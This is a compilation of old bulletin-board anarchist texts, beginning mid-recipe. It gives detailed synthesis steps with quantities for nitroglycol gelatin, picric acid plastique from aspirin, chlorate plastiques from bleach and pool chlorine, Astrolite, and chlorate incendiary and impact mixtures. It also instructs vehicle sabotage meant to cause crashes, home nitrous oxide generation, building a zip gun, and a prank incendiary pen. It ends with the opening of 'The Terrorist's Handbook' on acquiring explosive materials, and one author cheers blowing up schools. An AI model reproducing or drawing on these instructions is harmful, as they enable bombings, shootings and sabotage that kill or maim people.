exept that it is supple and pliable to -10 to -20 deg. C

   Antifreeze is easier to obtain than glycerine and is usually cheaper.  It
needs to be freed of water before the manufacture and this can be done by
treating it with calcium chloride until a specific gravity of 1.12 @ o deg.
C.  or 1.11 @ 20 deg.  C.  is obtained.

    This can be done by adding calcium chloride to the antifreeze and checking
with a hydrometer and continue to add calcium chloride until the proper
reading is obtained.  The antifreeze is then filtered to remove the calcium
chloride from the liquid.  This explosive is superior to nitro-gelatin in that
it is easier to collidon the IMR smokeless powder into the explosive and that
the 50/50 ether ethyl alcohol can be done away with.  It is superior in that
the formation of the collidon is done very rapidly by the nitroethelene
glycol.

   It's detonation properties are practically the same as the nitro-gelatine.
Like the nitro-gelatine it is highly flammable and if caught on fire the
chances are good that the flame will progress to detonation.  In this
explosive as in nitro-gelatine the addition of 1% sodium carbonate is a good
idea to reduce the chance of recidual acid being present in the final
explosive.  The following is a slightly different formula than nitro-gelatine:

Nitro-glycol 75%  Guncotton (IMR) 6%  Potassium Nitrate  14%   Flour 5%

    In this process the 50/50 step is omitted.  Mix the potassium nitrate with
the nitro-glycol.  Remember that this nitro-glycol is just as sensitive to
shock as is nitroglycerin.
    The next step is to mix in the baking flour and sodium carbonate. Mix
these by kneading with gloved hands until the mixture is uniform.  This
kneading should be done gently and slowly.  The mixture should be uniform when
the IMR smokeless powder is added.  Again this is kneaded to uniformity.  Use
this explosive as soon as possible.

    If it must be stored, store in a cool, dry place (0-10 deg.  C.).  This
explosive should detonate at 7600-7800 m/sec..  These two explosives are very
powerful and should be sensitive to a #6 blasting cap or equivelent.

    These explosives are dangerous and should not be made unless the
manufacturer has had experience with this type compound.  The foolish and
ignorant may as well forget these explosives as they won't live to get to use
them.
    Don't get me wrong, these explosives have been manufactured for years with
an amazing record of safety.  Millions of tons of nitroglycerine have been
made and used to manufacture dynamite and explosives of this nature with very
few mis haps.
   Nitroglycerin and nitroglycol will kill and their main victims are the
stupid and foolhardy.  Before manufacturing these explosives take a drop of
nitroglycerin and soak into a small piece of filter paper and place it on an
anvil.
  Hit this drop with a hammer and don't put any more on the anvil.  See what I
mean! This explosive compound is not to be taken lightly.  If there are any
doubts DON'T.

Improvised Explosives Plastique Explosive from Aspirin    by: The Lich

 This explosive is a phenol dirivative.  It is HIGHLY toxic and explosive
compounds made from picric acid are poisonous if inhaled, ingested, or handled
and absor- bed through the skin.  The toxicity of this explosive restrict's
its use due to the fact that over exposure in most cases causes liver and
kidney failure and sometimes death if immediate treatment is not obtained.

 This explosive is a cousin to T.N.T.  but is more powerful than it's cousin.
It is the first explosive used militarily and was adopted in 1888 as an
artillery shell filler.  Originally this explosive was derived from coal tar
but thanks to modern chemistry you can make this explosive easily in
approximately three hours from acetylsalicylic acid (aspirin purified).

 This procedure involves dissolving the acetylsalicylic acid in warm sulfuric
acid and adding sodium or potassium nitrate which nitrates the purified
aspirin and the whole mixture drowned in water and filtered to obtain the
final product.  This explosive is called trinitrophenol.  Care should be
taken to ensure that this explosive is stored in glass containers.  Picric
acid will form dangerous salts when allowed to contact all metals exept tin
and aluminum.  These salts are primary explosive and are super sensitive.
They also will cause the detonation of the picric acid.

 To make picric acid obtain some aspirin.  The cheaper brands work best but
buffered brands should be avoided.  Powder these tablets to a fine
consistancy. To extract the acetylsalicylic acid from this powder place this
powder in methyl alcohol and stir vigorously.  Not all of the powder will
dissolve.  Filter this powder out of the alcohol.  Again wash this powder that
was filtered out of the alcohol with more alcohol but with a lesser amount
than the first extraction.  Again filter the remaining powder out of the
alcohol.  Combine the now clear alcohol and allow it to evaporate in a pyrex
dish.  When the alcohol has evaporated there will be a surprising amount of
crystals in the bottom of the pyrex dish.

 Take forty grams of these purified acetylsalicylic acid crystals and
dissolve them in 150 ml.  of sulfuric acid (98%, specify gravity 1.8) and heat
to diss- olve all the crystals.  This heating can be done in a common electric
frying pan with the thermostat set on 150 deg.  F.  and filled with a good
cooking oil.

When all the crystals have dissolved in the sulfuric acid take the beaker,
that you've done all this dissolving in (600 ml.), out of the oil bath.  This
next step will need to be done with a very good ventilation system (it is a
good idea to do any chemistry work such as the whole procedure and any
procedure on this disk with good ventilation or outside).  Slowly start adding
58 g.  of sodium nitrate or 77 g.  of potassium nitrate to the acid mixture in
the beaker very slowly in small portions with vigorous stirring.  A red gas
(nitrogen trioxide) will be formed and this should be avoided.

  The mixture is likely to foam up and the addition should be stopped until
the foaming goes down to prevent the overflow of the acid mixture in the
beaker.  When the sodium or potassium nitrate has been added the mixture is
allowed to cool somewhat (30- 40 deg.  C.). The solution should then be dumped
slowly into twice it's volume of crushed ice and water.  The brilliant yellow
crystals will form in the water. These should be filtered out and placed in
200 ml.  of boiling distilled water. This water is allowed to cool and then
the crystals are then filtered out of the water.  These crystals are a very,
very pure trinitrophenol.  These crystals are then placed in a pyrex dish and
places in an oil bath and heated to 80 deg. C.  and held there for 2 hours.
This temperature is best maintained and checked with a thermometer.

  The crystals are then powdered in small quantities to a face powder
consistency.  These powdered crystals are then mixed with 10% by weight wax
and 5% vaseline which are heated to melting temperature and poured into the
crystals.  The mixing is best done by kneading together with gloved hands.
This explosive should have a useful plsticity range of 0-40 deg.  C..  The
detonation velocity should be around 7000 m/sec..  It is toxic to handle but
simply made from common ingredients and is suitable for most demolition work
requiring a moderately high detonation velocity.  It is very suitable for
shaped charges and some steel cutting charges.  It is not as good an explosive
as C-4 or other R.D.X.  based explosives but it is much easier to make.  Again
this explosive is very toxic and should be treated with great care.

  AVOID HANDLING BARE-HANDED, BREATHING DUST AND FUMES, AVOID ANY CHANCE OF
INGESTION. AFTER UTENSILS ARE USED FOR THE MANUFACTURE OF THIS EXPLOSIVE
RETIRE THEM FROM THE KITCHEN AS THE CHANCE OF POISONING IS NOT WORTH THE RISK.
THIS EXPLOSIVE, IF MANUFACTURED AS ABOVE, AHOULD BE SAFE IN STORAGE BUT WITH
ANY HOMEMADE EXPLOSIVE STORAGE OS NOT RECOMENDED AND EXPLOSIVES SHOULD BE MADE
UP AS NEEDED.


Improvised Explosives Plastique Explosive from Bleach     by: The Lich

 This explosive is a potassium chlorate explosive.  This explosive and
explosives of similar composition were used in World War II as the main
explosive filler in gernades, land mines, and mortar used by French, German,
and other forces involoved in that conflict.  These explosives are relatively
safe to manufacture.

  One should strive to make sure these explosives are free of sulfur,
sulfides, and picric acid.  The presence of these compounds result in mixtures
that are or can become highly sensitive and possibly decompose ex- plosively
while in storage.  The manufacture of this explosive from bleach is given as
just an expediant method.  This method of manufacturing potassium chlorate is
not economical due to the amount of energy used to boil the solution and cause
the 'dissociation' reaction to take place.  This procedure does work and
yields a relatively pure and a sulfur/sulfide free product.  These explosives
are very cap sensitive and require only a #3 cap for instigating detonation.

  To manufacture potassium chlorate from bleach (5.25% sodium hypochlorite
solution) obtain a heat source (hot plate etc.) a battery hydrometer, a large
pyrex or enameled steel container (to weigh chemicals), and some potassium
chloride (sold as salt substitute).  Take one gallon of bleach, place it in
the container and begin heating it.  While this solution heats, weigh out 63
g.  potassium chloride and add this to the bleach being heated. Bring this
solution to a boil and boiled until when checked by a hydrometer the reading
is 1.3 (if a battery hydrometer is used it should read full charge).

 When the reading is 1.3 take the solution and let it cool in the refrigerator
until it's between room temperature and 0 deg.  C..  Filter out the crystals
that have formed and save them.  Boil the solution again until it reads 1.3 on
the hydrometer and again cool the solution.  Filter out the crystals that have
formed and save them.  Boil this solution again and cool as before.

  Filter and save the crystals.  Take these crystals that have been saved and
mix them with distilled water in the following proportions: 56 g.  per 100 ml.
distilled water.  Heat this solution until it boils and allow it to cool.
Filter the solution and save the crystals that form upon cooling.  The process
if purifi- cation is called fractional crystalization.  These crystals should
be relatively pure potassium chlorate.

 Powder these to the consistency of face powder (400 mesh) and heat gently to
drive off all moisture.  Melt five parts vasoline and five parts wax.
Dissolve this in white gasoline (camp stove gasoline) and pour this liquid on
90 parts potassium chlorate (the crystals from the above operation) in a
plastic bowl. Knead this liquid into the potassium chlorate until immediately
mixed.  Allow all the gasoline to evaporate.  Place this explosive in a cool,
dry place.  Avoid friction, sulfur, sulfide, and phosphorous compounds.

     This explosive is best molded to the desired shape and density
(1.3g./cc.) and dipped in wax to water proof.  These block type charges
guarantee the highest detonation velocity.  This explosive is really not
suited to use in shaped charge applications due to its relatively low
detonation velocity.  It is comparable to 40% ammonia dynamite and can be
considered the same for the sake of charge computation.

    If the potassium chlorate is bought and not made it is put into the
manufacture pro- cess in the powdering stages preceding the addition of the
wax/vaseline mix- ture.  This explosive is bristant and powerful.  The
addition of 2-3% aluminum powder increases its blast effect.  Detonation
velocity is 3300 m/sec..


Plastique Explosives From Swimming Pool Chlorinating Compound    By the Lich

 This explosive is a chlorate explosive from bleach.  This method of
production of potassium or sodium chlorate is easier and yields a more pure
product than does the plastique explosive from bleach process.

  In this reaction the H.T.H. (calcium hypochlorite CaC10) is mixed with water
and heated with either sodium chloride (table salt, rock salt) or potassium
chloride (salt substitute).  The latter of these salts is the salt of choice
due to the easy crystalization of the potassium chlorate.

  This mixture will need to be boiled to ensure complete reaction of the
ingredients.  Obtain some H.T.H.  swimming pool chlorination compound or
equivilant (usually 65% calcium hypochlorite).  As with the bleach process
mentioned earlier the reaction described below is also a dissociation
reaction.  In a large pyrex glass or enamled steel container place 1200g.
H.T.H. and 220g.  potassium chloride or 159g.  sodium chloride.  Add enough
boiling water to dissolve the powder and boil this solution.  A chalky
substance (calcium chloride) will be formed.  When the formation of this
chalky substance is no longer formed the solution is filtered while boiling
hot.  If potassium chloride was used potassium chlorate will be formed.

    This potassium chlorate will drop out or crystalize as the clear liquid
left after filtering cools.  These crystals are filtered out when the solution
reaches room temperature.  If the sodium chloride salt was used this clear
filtrate (clear liquid after filter- ation) will need to have all water
evaporated.  This will leave crystals which should be saved.

    These crystals should be heated in a slightly warm oven in a pyrex dish to
drive off all traces of water (40-75 deg.  C.).  These crystals are ground to
a very fine powder (400 mesh).

    If the sodium chloride salt is used in the initial step the crystalization
is much more time consuming.  The potassium chloride is the salt to use as the
resulting product will crystalize out of the solution as it cools.  The
powdered and completely dry chlorate crystals are kneaded together with
vaseline in a plastic bowl.  ALL CHLORATE BASED EXPLOSIVES ARE SENSITIVE TO
FRICTION AND SHOCK AND THESE SHOULD BE AVOIDED.  If sodium chloride is used in
this explosive it will have a tendancy to cake and has a slightly lower
detonation velocity.

  This explosive is composed of the following:

 potassium/sodium chlorate 90%        vaseline  10%

   Simply pour the powder into a plastic baggy and knead in the vaseline
carefully. this explosive (especially if the Sodium Chlorate variation is
used) should not be exposed to water or moisture.

 The detonation velocity can be raised to a slight extent by the addition of
2-3% aluminum substituted for 2-3% of the vaseline.  This addition of this
aluminum will give the explosive a bright flash if set off at night which will
ruin night vision for a short while.  The detonation velocity of this
explosive is approximately 3200 m/sec.  for the potassium salt and 2900 m/sec.
for the sodium salt based explosive.

Addendum 4/12/91:

   It was claimed above that this explosive degrades over time. I would assume
that this occurs due to the small amount of water present in the vaseline, and
that a different type of fuel would be better than the vaseline.


ASSORTED NASTIES:

                                  Sweet-Oil
 In this one you open there hood and pour some honey in their oil spout.  if
you have time you might remover the oil plug first and drain some of the oil
out.  I have tried this one but wasn't around to see the effects but I am sure
that I did some damage.

                                   Slow Air
 Ok, sneak up the victims car and poke a small hole somewhere in 2 of his/her
tires.  They only have 1 spare.  Now if the hole is small but there then there
tire will go flat some where on the road.  You could slice the tire so this is
blows out on the road wih a razor blade.  Cut a long and fairly deep (don't
cut a hole all the way through) and peel a little bit of the rubber back and
cut that off.  Now very soon there tires will go flat or a possible blow out
at a high speed if your lucky.

                               Vanishing Paint
 Spread a little gas or paint thiner on the victims car and this will make his
paint run and fade.  Vodka will eat the paint off and so will a little 190.
Eggs work great on paint if they sit there long enough.

                                 Loose Wheel
 Loosen the lugs on you victums tires so that they will soon fall off.  This
can really fuck some one up if they are cruising when the tire falls off.

                                 Dual Neutral
   This name sucks but pull the 10 bolt or what ever they have there off.  (On
the real wheels, in the middle of the axle) Now throw some screws, blots, nuts
and assorted things in there and replace the cover. At this point you could
chip some of the teeth off the gears.

                                  Un-Midaser
 Crawl under there car with a rachet and losen all the nuts on their exhaust
so that it hangs low and will fall off soon. This method also works on
transmissions but is a little harder to get all bolts off, but the harder you
work the more you fuck them over.


                                 LAUGHING GAS

Learn how to make laughing gas from ammonium nitrate. Laughing gas was one of
the earliest anaesthetics.  After a little while of inhaling the gas the
patient became so happy [ain't life great?] he couldn't keep from laughing.
Finally he would drift off to a pleasant sleep.

   Some do-it-yourselfers have died while taking laughing gas.  This is
because they has generated it through plastic bags while their heads were
inside. They were simply suffocating but were too bombed out to realize it.
   The trick is to have a plastic clothes bag in which you generate a lot of
the gas.  Then you stop generating the gas and hold a small opening of the bag
under your nose, getting plenty of oxygen in the meantime.  Then, Whee!
  To make it you start with ammonium nitrate bought from a chemical supply
house or which you have purified with 100% rubbing or wood alcohol.

  First, dissolve a quantity of ammonium nitrate in some water.  Then you
evaporate the water over the stove, while stirring, until you have a heavy
brine.  When nearly all the moisture is out it should solidify instantly when
a drop is put on an ice cold metal plate.

  When ready, dump it all out on a very cold surface.  After a while, break
it up and store it in a bottle.

   A spoonful is put into a flask with a one-hole stopper, with a tube leading
into a big plastic bag.  The flask is heated with an alcohol lamp.

   When the temperature in the flask reaches 480 F the gas will generate.  If
white fumes appear the heat should be lowered as the stuff explodes at 600 F.

  When the bag is filled, stop the action and get ready to turn on.

CAUTION:  N2O supplants oxygen in your blood, but you don't realize it.  It's
        easy to die from N2O because you're suffocating and your breathing
        reflex doesn't know it.  Do not put your head in a plastic bag
        (duhh...) because you will cheerfully choke to death.

                              PIPE OR "ZIP" GUNS

    Commonly known as "zip" guns, guns made from pipe have been used for years
by juvenile punks.  Today's Militants   make them just for the hell of it or
to shoot once in an   assassination or riot and throw away if there is any
danger of apprehension.

    They can be used many times but with some, a length of dowel is needed to
force out the spent shell.

    There are many variations but the illustration shows the basic design.

    First, a wooden stock is made and a groove is cut for the barrel to rest
in.  The barrel is then taped securely to the stock with a good, strong
tape.

    The trigger is made from galvanized tin.  A slot is punched in the trigger
flap to hold a roofing nail, which is wired or soldered onto the flap.  The
trigger is bent and nailed to the stock on both sides.

    The pipe is a short length of one-quarter inch steel gas or water pipe
with a bore that fits in a cartridge, yet keeps the cartridge rim from passing
through the pipe.

    The cartridge is put in the pipe and the cap, with a hole bored through
it, is screwed on.  Then the trigger is slowly released to let the nail pass
through the hole and   rest on the primer.

    To fire, the trigger is pulled back with the left hand and held back with
the thumb of the right hand.  The gun is then aimed and the thumb releases the
trigger and the thing actually fires.

    Pipes of different lengths and diameters are found in any hardware store.
All caliber bullets, from the .22 to the .45 are used in such guns.

    Some zip guns are made from two or three pipes nested within each other.
For instance, a .22 shell will fit snugly into a length of a car's copper gas
line. Unfortunatey, the copper is too weak to withstand the pressure of the
firing.  So the length of gas line is spread   with glue and pushed into a
wider length of pipe.  This is   spread with glue and pushed into a length of
steel pipe with threads and a cap.

    Using this method, you can accomodate any cartridge, even a rifle shell.
The first size of pipe for a rifle   shell accomodates the bullet.  The second
accomodates its wider powder chamber.

    A 12-gauge shotgun can be made from a 3/4 inch steel pipe.  If you want to
comply with the gun laws, the barrel should be at least eighteen inches long.

    Its firing mechanism is the same as that for the pistol. It naturally has
a longer stock and its handle is lengthened into a rifle butt.  Also, a small
nail is driven half way into each side of the stock about four inches in the
front of the trigger.  The rubber band is put over one nail and   brought
around the trigger and snagged over the other nail.

    In case you actually make a zip gun, you should test it before firing it
by hand.  This is done by first tying the gun to a tree or post, pointed to
where it will do no damage.  Then a string is tied to the trigger and you go
off several yards.  The string is then pulled back and let go. If the barrel
does not blow up, the gun is (probably) safe to fire by hand. Repeat firings
may weaken the barrel, so NO zip gun can be considered "safe" to use.


Astrolite and Sodium Chlorate Explosives By: Future Spy & The Fighting Falcon

Note: Information on the Astrolite Explosives were taken from the book
 'Two Component High Explosive Mixtures' By Desert Pub'l

Some of the chemicals used are somewhat toxic, but who gives a fuck! Go ahead!
I won't even bother mentioning 'This information is for enlightening purposes
only'! I would love it if everyone made a gallon of astrolite and blew their
fucking school to kingdom scum!

                                  Astrolite

The astrolite family of liquid explosives were products of rocket propellant
research in the '60's.  Astrolite A-1-5 is supposed to be the world's most
powerful non-nuclear explosive -at about 1.8 to 2 times more powerful than
TNT. Being more powerful it is also safer to handle than TNT (not that it
isn't safe in the first place) and Nitroglycerin.

                                 Astrolite G
"Astrolite G is a clear liquid explosive especially designed to produce very
high detonation velocity, 8,600MPS (meters/sec.), compared with 7,700MPS for
nitroglycerin and 6,900MPS for TNT...In addition, a very unusual
characteristic is that it the liquid explosive has the ability to be absorbed
easily into the ground while remaining detonatable...In field tests, Astrolite
G has remained detonatable for 4 days in the ground, even when the soil was
soaked due to rainy weather" know what that means?....Astrolite Dynamite!

              To make (mix in fairly large container & outside)
    Two parts by weight of ammonium nitrate mixed with one part by weight
'anhydrous' hydrazine, produces Astrolite G...Simple enough eh? I'm sure that
the 2:1 ratio is not perfect,and that if you screw around with it long enough,
that you'll find a better formula.  Also, dunno why the book says 'anhydrous'
hydrazine, hydrazine is already anhydrous...

    Hydrazine is the chemical you'll probably have the hardest time getting
hold of. Uses for Hydrazine are: Rocket fuel, agricultural chemicals (maleic
hydra-zide), drugs (antibacterial and antihypertension), polymerization
catalyst, plating metals on glass and plastics, solder fluxes, photographic
developers, diving equipment.  Hydrazine is also the chemical you should be
careful with.

                              Astrolite A/A-1-5
Mix 20% (weight) aluminum powder to the ammonium nitrate, and then mix with
hydrazine.  The aluminum powder should be 100 mesh or finer.  Astrolite A has
a detonation velocity of 7,800MPS.

                                 Misc.  info
You should be careful not to get any of the astrolite on you,if it happens
though, you should flush the area with water.  Astrolite A&G both should be
able to be detonated by a #8 blasting cap.


                           Sodium Chlorate Formulas

Sodium Chlorate is similar to potassium chlorate,and in most cases can be a
substitute.  Sodium chlorate is also more soluble in water.  You can find
sodium chlorate at Channel or any hardware/home improvement store.  It is used
in blowtorches and you can get about 3lbs for about $6.00.

                          Sodium Chlorate Gunpowder

65% sodium chlorate, 22% charcoal, 13% sulfur, sprinkle some graphite on top.

                                 Rocket Fuel
6 parts sodium chlorate mixed *THOROUGHLY* with 5 parts rubber cement.

                      Rocket Fuel 2 (better performance)

50% sodium chlorate, 35% rubber cement ('One-Coat' brand),
10% epoxy resin hardener, 5% sulfur

You may want to add more sodium chlorate depending on the purity you are using.

                              Incendiary Mixture
55% aluminum powder (atomized), 45% sodium chlorate, 5% sulfur

                                Impact Mixture
50% red phosphorus, 50% sodium chlorate

Unlike potassium chlorate,sodium chlorate won't explode spontaneously when
mix- ed with phosphorus.  It has to be hit to be detonated.

                               Filler explosive
85% sodium chlorate, 10% vaseline, 5% aluminum powder

                            Nitromethane formulas
I thought that I might add this in since it's similar to Astrolite.

Nitromethane (CH3NO2)              specific gravity:1.139
flash point:95f                    auto-ignite:785f

Derivation: reaction of methane or propane with nitric acid under pressure.
Uses:       Rocket fuel; solvent for cellulosic compounds, polymers, waxes,
fats, etc.

To be detonated with a #8 cap, add:

1) 95% nitromethane + 5% ethylenediamine 2) 94% nitromethane + 6% aniline

Power output: 22-24% more powerful than TNT.  Detonation velocity of 6,200MPS.

                       Nitromethane 'solid' explosives
2 parts nitromethane, 5 parts ammonium nitrate (solid powder)

soak for 3-5 min.  when done,store in an air-tight container.  This is
supposed to be 30% more powerful than dynamite containing 60% nitro-glycerin,
and has 30% more brilliance.

 The Firey Explosive Pen   Written by Blue Max of Anarchist-R-Us

 Materials Needed                       Here's a GREAT little trick to play on
 1] One Ball Point `Click` pen          your best fiend (no thats not a typo) at
 2] Gun Powder                          skool, or maybe as a practial joke on a
 3] 8 or 10 match heads                 friend!
 4] 1 Match stick
 5] a sheet of sand paper (1 1/2" X 2")

1] Unscrew pen and remove all parts but leave the button in the top.
2] Stick the match stick in the part of the pen clicker where the other little
  parts and the ink fill was.
3] Roll sand paper up and put around the match stick that is in the clicker.
4] Put the remaining Match Heads inside the pen, make sure that they are on
   the inside on the sand paper.
5] Put a small piece of paper or something in the other end of the pen where
  the ball point comes out.
6] Fill the end with the piece of paper in it with gun powder.  The paper is
  to keep the powder from spilling.

The Finished pen should look like this:

 Small Paper Clog  Gun Powder   Matches & Sandpaper  \
  |                                                  |
  \             |     |
   \ _________________|____________________|________
    <_______________________________|_______________|===

call the RIPCO bulletin board, 'a hell of a bbs' at (312) 528-5020


            MERCURY BATTERY BOMB!      By Phucked Agent!

Materials:

1 Mercury Battery (1.5 or 1.4 V Hearing Aid), 1 working lamp with on/off switch

  It is VERY SIMPLE!!! Hurray! Kids under 18 shouldn't considered try this one
or else they would have mercuric acid on their faces!

1.  Turn the lamp switch on to see if lite-bulb light up.
2.  If work, leave the switch on and unplug the cord
3.  Unscrew the bulb (Dont touch the hot-spot!)
4.  Place 1 Mercury Battery in the socket and make sure that it is touching
the Hot-spot contact.
5.  Move any object or furniture - Why? There may be sparx given off!
6.  Now your favorite part, stand back and plug in cord in the socket.
7.  And you will have fun!! Like Real Party!!!


 
1.0     INTRODUCTION

     Gunzenbomz Pyro-Technologies, a division of Chaos Industries (CHAOS), is
proud to present this first edition of The Terrorist's Handbook.  First and
foremost, let it be stated that Chaos Industries assumes no responsibilities
for any misuse of the information presented in this publication.  The purpose
of this is to show the many techniques and methods used by those people in this
and other countries who employ terror as a means to political and social goals.
The techniques herein can be obtained from public libraries, and can usually be
carried out by a terrorist with minimal equipment.  This makes one all the more
frightened, since any lunatic or social deviant could obtain this information,
and use it against anyone.  The processes and techniques herein SHOULD NOT BE
CARRIED OUT UNDER ANY CIRCUMSTANCES!!  SERIOUS HARM OR DEATH COULD OCCUR FROM
ATTEMPTING TO PERFORM ANY OF THE METHODS IN THIS PUBLICATION.  THIS IS MERELY
FOR READING ENJOYMENT, AND IS NOT INTENDED FOR ACTUAL USE!!

Gunzenbomz Pyro-Technologies feels that it is important that everyone has some
idea of just how easy it is for a terrorist to perform acts of terror; that is
the reason for the existence of this publication.

1.1          Table of Contents
             _________________

2.0   BUYING EXPLOSIVES AND PROPELLANTS
2.01    Black Powder
2.02    Pyrodex
2.03    Rocket Engine Powder
2.04    Rifle/Shotgun Powder
2.05    Flash Powder
2.06    Ammonium Nitrate
2.1   ACQUIRING CHEMICALS
2.11    Techniques for Picking Locks
2.2   LIST OF USEFUL HOUSEHOLD CHEMICALS AND AVAILABILITY
2.3   PREPARATION OF CHEMICALS
2.31    Nitric Acid
2.32    Sulfuric Acid
2.33    Ammonium Nitrate

3.0   EXPLOSIVE RECIPES
3.01    Explosive Theory
3.1   IMPACT EXPLOSIVES
3.11    Ammonium Triiodide Crystals
3.12    Mercury Fulminate
3.13    Nitroglycerine
3.14    Picrates
3.2   LOW ORDER EXPLOSIVES
3.21    Black Powder
3.22    Nitrocellulose
3.23    Fuel + Oxodizer mixtures
3.24    Perchlorates
3.3   HIGH ORDER EXPLOSIVES
3.31    R.D.X. (Cyclonite)
3.32    Ammonium Nitrate
3.33    ANFOS
3.34    T.N.T.
3.35    Potassium Chlorate
3.36    Dynamite
3.37    Nitrostarch Explosives
3.38    Picric Acid
3.39    Ammonium Picrate (Explosive D)
3.40    Nitrogen Trichloride
3.41    Lead Azide
3.5   OTHER "EXPLOSIVES"
3.51    Thermit
3.52    Molotov Cocktails
3.53    Chemical Fire Bottle
3.54    Bottled Gas Explosives

4.0   USING EXPLOSIVES
4.1   SAFETY
4.2   IGNITION DEVICES
4.21    Fuse Ignition
4.22    Impact Ignition
4.23    Electrical Ignition
4.24    Electro - Mechanical Ignition
4.241   Mercury Switches
4.242   Tripwire Switches
4.243   Radio Control Detonators
4.3   DELAYS
4.31    Fuse Delays
4.32    Timer Delays
4.33    Chemical Delays
4.4   EXPLOSIVE CONTAINERS
4.41    Paper Containers
4.42    Metal Containers
4.43    Glass Containers
4.44    Plastic Containers
4.5   ADVANCED USES FOR EXPLOSIVES
4.51    Shaped Charges
4.52    Tube Explosives
4.53    Atomized Particle Explosions
4.54    Lightbulb Bombs
4.55    Book Bombs
4.56    Phone Bombs

5.0   SPECIAL AMMUNITION FOR PROJECTILE WEAPONS
5.1   PROJECTILE WEAPONS (PRIMITIVE)
5.11    Bow and Crossbow Ammunition
5.12    Blowgun Ammunition
5.13    Wrist Rocket and Slingshot Ammunition
5.2   PROJECTILE WEAPONS (FIREARMS)
5.21    Handgun Ammunition
5.22    Shotguns
5.3   PROJECTILE WEAPONS (COMPRESSED GAS)
5.31    .177 Caliber B.B Gun Ammunition
5.32    .22 Caliber Pellet Gun Ammunition

6.0   ROCKETS AND CANNONS
6.1   ROCKETS
6.11    Basic Rocket-Bomb
6.12    Long Range Rocket-Bomb
6.13    Multiple Warhead Rocket-Bombs
6.2   CANNONS
6.21    Basic Pipe Cannon
6.22    Rocket-Firing Cannon

7.0   PYROTECHNICA ERRATA
7.1     Smoke Bombs
7.2     Colored Flames
7.3     Tear Gas
7.4     Fireworks
7.41    Firecrackers
7.42    Skyrockets
7.43    Roman Candles

8.0   LISTS OF SUPPLIERS AND FURTHER INFORMATION

9.0   CHECKLIST FOR RAIDS ON LABS

10.   USEFUL PYROCHEMISTRY

11.0  ABOUT THE AUTHOR


2.0   BUYING EXPLOSIVES AND PROPELLANTS

     Almost any city or town of reasonable size has a gun store and
a pharmacy.  These are two of the places that potential terrorists visit in
order to purchase explosive material.  All that one has to do is know something
about the non-explosive uses of the materials.  Black powder, for example,
is used in blackpowder firearms.  It comes in varying "grades", with each
different grade being a slightly different size.  The grade of black powder
depends on what the calibre of the gun that it is used in; a fine grade of
powder could burn too fast in the wrong caliber weapon.  The rule is:
the smaller the grade, the faster the burn rate of the powder.


2.01   BLACK POWDER

     Black powder is generally available in three grades.  As stated before,
the smaller the grade, the faster the powder burns.  Burn rate is extremely
important in bombs.  Since an explosion is a rapid increase of gas volume in
a confined environment, to make an explosion, a quick-burning powder is
desirable. The three common grades of black powder are listed below, along
with the usual bore width (calibre) of what they are used in.  Generally,
the fastest burning powder, the FFF grade is desirable.  However, the other
grades and uses are listed below:

     GRADE              BORE WIDTH               EXAMPLE OF GUN
     _____              __________               ______________

     F                  .50 or greater           model cannon; some rifles
     FF                 .36 - .50                large pistols; small rifles
     FFF                .36 or smaller           pistols; derringers


     The FFF grade is the fastest burning, because the smaller grade has
more surface area or burning surface exposed to the flame front.  The larger
grades also have uses which will be discussed later.  The price range of
black powder, per pound, is about $8.50 - $9.00.  The price is not affected
by the grade, and so one saves oneself time and work if one buys the finer
grade of powder.  The major problems with black powder are that it can be
ignited accidentally by static electricity, and that it has a tendency to
absorb moisture from the air.  To safely crush it, a bomber would use a plastic
spoon and a wooden salad bowl.  Taking a small pile at a time, he or she would
apply pressure to the powder through the spoon and rub it in a series of strokes
or circles, but not too hard.  It is fine enough to use when it is about as fine
as flour.  The fineness, however, is dependant on what type of device one wishes
to make; obviously, it would be impracticle to crush enough powder to fill a 1
foot by 4 inch radius pipe.  Anyone can purchase black powder, since anyone can
own black powder firearms in America.


2.02    PYRODEX

     Pyrodex is a synthetic powder that is used like black powder.  It comes
in the same grades, but it is more expensive per pound.  However, a one pound
container of pyrodex contains more material by volume than a pound of black
powder.  It is much easier to crush to a very fine powder than black powder, and
it is considerably safer and more reliable.  This is because it will
not be set off by static electricity, as black can be, and it is less inclined
to absorb moisture.  It costs about $10.00 per pound.  It can be crushed in the
same manner as black powder, or it can be dissolved in boiling water and dried.


2.03        ROCKET ENGINE POWDER

     One of the most exciting hobbies nowadays is model rocketry.  Estes is
the largest producer of model rocket kits and engines.  Rocket engines are
composed of a single large grain of propellant.  This grain is surrounded by
a fairly heavy cardboard tubing.  One gets the propellant by slitting the tube
lengthwise, and unwrapping it like a paper towel roll.  When this is done, the
grey fire clay at either end of the propellant grain must be removed.  This is
usually done gently with a plastic or brass knife. The material is exceptionally
hard, and must be crushed to be used.  By gripping the grain on the widest
setting on a set of pliers, and putting the grain and powder in a plastic bag,
the powder will not break apart and shatter all over.  This should be done to
all the large chunks of powder, and then it should be crushed like black powder.
Rocket engines come in various sizes, ranging from 1/4 A - 2T to the incredibly
powerful D engines.  The larger the engine, the more expensive.  D engines come
in packages of three, and cost about $5.00 per package.  Rocket engines are
perhaps the single most useful item sold in stores to a terrorist, since they
can be used as is, or can be cannibalized for their explosive powder.


2.04       RIFLE/SHOTGUN POWDER

     Rifle powder and shotgun powder are really the same from a practicle
standpoint.  They are both nitrocellulose based propellants.  They will be
referred to as gunpowder in all future references.  Gunpowder is made by the
action of concentrated nitric and sulfuric acid upon cotton.  This material is
then dissolved by solvents and then reformed in the desired grain size.  When
dealing with gunpowder, the grain size is not nearly as important as that of
black powder.  Both large and small grained gunpowder burn fairly slowly
compared to black powder when unconfined, but when it is confined, gunpowder
burns both hotter and with more gaseous expansion, producing more pressure.
Therefore, the grinding process that is often necessary for other propellants
is not necessary for gunpowder.  Gunpowder costs about $9.00 per pound. Any
idiot can buy it, since there are no restrictions on rifles or shotguns in the
U.S.


2.05       FLASH POWDER

     Flash powder is a mixture of powdered zirconium metal and various
oxidizers.  It is extremely sensitive to heat or sparks, and should be treated
with more care than black powder, with which it should NEVER be mixed.  It is
sold in small containers which must be mixed and shaken before use.  It is very
finely powdered, and is available in three speeds: fast, medium, and slow.  The
fast flash powder is the best for using in explosives or detonators.  It burns
very rapidly, regardless of confinement or packing, with a hot white "flash",
hence its name.  It is fairly expensive, costing about $11.00.  It is sold
in magic shops and theatre supply stores.


2.06       AMMONIUM NITRATE

     Ammonium nitrate is a high explosive material that is often used as
a commercial "safety explosive"  It is very stable, and is difficult to ignite
with a match.  It will only light if the glowing, red-hot part of a match is
touching it.  It is also difficult to detonate; (the phenomenon of detonation
will be explained later)  it requires a large shockwave to cause it to go high
